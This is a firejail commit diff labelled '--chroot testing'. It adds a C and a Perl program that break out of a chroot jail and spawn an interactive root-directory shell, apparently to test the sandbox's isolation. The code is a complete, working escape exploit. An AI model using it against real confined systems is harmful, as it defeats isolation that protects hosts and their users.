diff options
author | netblue30 <netblue30@yahoo.com> | 2015-10-31 13:07:38 -0400 |
---|---|---|
committer | netblue30 <netblue30@yahoo.com> | 2015-10-31 13:07:38 -0400 |
commit | 1cb8ef59101eeaa1b325fb7f881ded148b0de1d3 (patch) | |
tree | ea114440c2236e1418a17f0e78c3050262965d98 /src/tools | |
parent | readme.md (diff) | |
download | firejail-1cb8ef59101eeaa1b325fb7f881ded148b0de1d3.tar.gz firejail-1cb8ef59101eeaa1b325fb7f881ded148b0de1d3.tar.zst firejail-1cb8ef59101eeaa1b325fb7f881ded148b0de1d3.zip |
--chroot testing
Diffstat (limited to 'src/tools')
-rwxr-xr-x | src/tools/unchroot | bin | 0 -> 9720 bytes | |||
-rw-r--r-- | src/tools/unchroot.c | 125 | ||||
-rwxr-xr-x | src/tools/unchroot.pl | 33 |
3 files changed, 158 insertions, 0 deletions
diff --git a/src/tools/unchroot b/src/tools/unchroot new file mode 100755 index 000000000..d32ce2682 --- /dev/null +++ b/src/tools/unchroot | |||
Binary files differ | |||
diff --git a/src/tools/unchroot.c b/src/tools/unchroot.c new file mode 100644 index 000000000..21731296e --- /dev/null +++ b/src/tools/unchroot.c | |||
@@ -0,0 +1,125 @@ | |||
1 | #include <stdio.h> | ||
2 | #include <stdlib.h> | ||
3 | #include <errno.h> | ||
4 | #include <fcntl.h> | ||
5 | #include <string.h> | ||
6 | #include <unistd.h> | ||
7 | #include <sys/stat.h> | ||
8 | #include <sys/types.h> | ||
9 | |||
10 | /* | ||
11 | ** You should set NEED_FCHDIR to 1 if the chroot() on your | ||
12 | ** system changes the working directory of the calling | ||
13 | ** process to the same directory as the process was chroot()ed | ||
14 | ** to. | ||
15 | ** | ||
16 | ** It is known that you do not need to set this value if you | ||
17 | ** running on Solaris 2.7 and below. | ||
18 | ** | ||
19 | */ | ||
20 | #define NEED_FCHDIR 0 | ||
21 | |||
22 | #define TEMP_DIR "waterbuffalo" | ||
23 | |||
24 | /* Break out of a chroot() environment in C */ | ||
25 | |||
26 | int main() { | ||
27 | int x; /* Used to move up a directory tree */ | ||
28 | int done=0; /* Are we done yet ? */ | ||
29 | #ifdef NEED_FCHDIR | ||
30 | int dir_fd; /* File descriptor to directory */ | ||
31 | #endif | ||
32 | struct stat sbuf; /* The stat() buffer */ | ||
33 | |||
34 | /* | ||
35 | ** First we create the temporary directory if it doesn't exist | ||
36 | */ | ||
37 | if (stat(TEMP_DIR,&sbuf)<0) { | ||
38 | if (errno==ENOENT) { | ||
39 | if (mkdir(TEMP_DIR,0755)<0) { | ||
40 | fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR, | ||
41 | strerror(errno)); | ||
42 | exit(1); | ||
43 | } | ||
44 | } | ||
45 | else { | ||
46 | fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR, | ||
47 | strerror(errno)); | ||
48 | exit(1); | ||
49 | } | ||
50 | } | ||
51 | else if (!S_ISDIR(sbuf.st_mode)) { | ||
52 | fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR); | ||
53 | exit(1); | ||
54 | } | ||
55 | |||
56 | #ifdef NEED_FCHDIR | ||
57 | /* | ||
58 | ** Now we open the current working directory | ||
59 | ** | ||
60 | ** Note: Only required if chroot() changes the calling program's | ||
61 | ** working directory to the directory given to chroot(). | ||
62 | ** | ||
63 | */ | ||
64 | if ((dir_fd=open(".",O_RDONLY))<0) { | ||
65 | fprintf(stderr,"Failed to open \".\" for reading - %s\n", | ||
66 | strerror(errno)); | ||
67 | exit(1); | ||
68 | } | ||
69 | #endif | ||
70 | |||
71 | /* | ||
72 | ** Next we chroot() to the temporary directory | ||
73 | */ | ||
74 | if (chroot(TEMP_DIR)<0) { | ||
75 | fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR, | ||
76 | strerror(errno)); | ||
77 | exit(1); | ||
78 | } | ||
79 | |||
80 | #ifdef NEED_FCHDIR | ||
81 | /* | ||
82 | ** Partially break out of the chroot by doing an fchdir() | ||
83 | ** | ||
84 | ** This only partially breaks out of the chroot() since whilst | ||
85 | ** our current working directory is outside of the chroot() jail, | ||
86 | ** our root directory is still within it. Thus anything which refers | ||
87 | ** to "/" will refer to files under the chroot() point. | ||
88 | ** | ||
89 | ** Note: Only required if chroot() changes the calling program's | ||
90 | ** working directory to the directory given to chroot(). | ||
91 | ** | ||
92 | */ | ||
93 | if (fchdir(dir_fd)<0) { | ||
94 | fprintf(stderr,"Failed to fchdir - %s\n", | ||
95 | strerror(errno)); | ||
96 | exit(1); | ||
97 | } | ||
98 | close(dir_fd); | ||
99 | #endif | ||
100 | |||
101 | /* | ||
102 | ** Completely break out of the chroot by recursing up the directory | ||
103 | ** tree and doing a chroot to the current working directory (which will | ||
104 | ** be the real "/" at that point). We just do a chdir("..") lots of | ||
105 | ** times (1024 times for luck :). If we hit the real root directory before | ||
106 | ** we have finished the loop below it doesn't matter as .. in the root | ||
107 | ** directory is the same as . in the root. | ||
108 | ** | ||
109 | ** We do the final break out by doing a chroot(".") which sets the root | ||
110 | ** directory to the current working directory - at this point the real | ||
111 | ** root directory. | ||
112 | */ | ||
113 | for(x=0;x<1024;x++) { | ||
114 | chdir(".."); | ||
115 | } | ||
116 | chroot("."); | ||
117 | |||
118 | /* | ||
119 | ** We're finally out - so exec a shell in interactive mode | ||
120 | */ | ||
121 | if (execl("/bin/sh","-i",NULL)<0) { | ||
122 | fprintf(stderr,"Failed to exec - %s\n",strerror(errno)); | ||
123 | exit(1); | ||
124 | } | ||
125 | } | ||
diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl new file mode 100755 index 000000000..bd30ffe76 --- /dev/null +++ b/src/tools/unchroot.pl | |||
@@ -0,0 +1,33 @@ | |||
1 | #!/usr/bin/perl -w | ||
2 | use strict; | ||
3 | # unchroot.pl Dec 2007 | ||
4 | # http://pentestmonkey.net/blog/chroot-breakout-perl | ||
5 | |||
6 | # This script may be used for legal purposes only. | ||
7 | |||
8 | # Go to the root of the jail | ||
9 | chdir "/"; | ||
10 | |||
11 | # Open filehandle to root of jail | ||
12 | opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn"; | ||
13 | |||
14 | # Create a subdir, move into it | ||
15 | mkdir "mysubdir"; | ||
16 | chdir "mysubdir"; | ||
17 | |||
18 | # Lock ourselves in a new jail | ||
19 | chroot "."; | ||
20 | |||
21 | # Use our filehandle to get back to the root of the old jail | ||
22 | chdir(*JAILROOT); | ||
23 | |||
24 | # Get to the real root | ||
25 | while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) { | ||
26 | chdir ".."; | ||
27 | } | ||
28 | |||
29 | # Lock ourselves in real root - so we're not really in a jail at all now | ||
30 | chroot "."; | ||
31 | |||
32 | # Start an un-jailed shell | ||
33 | system("/bin/sh"); | ||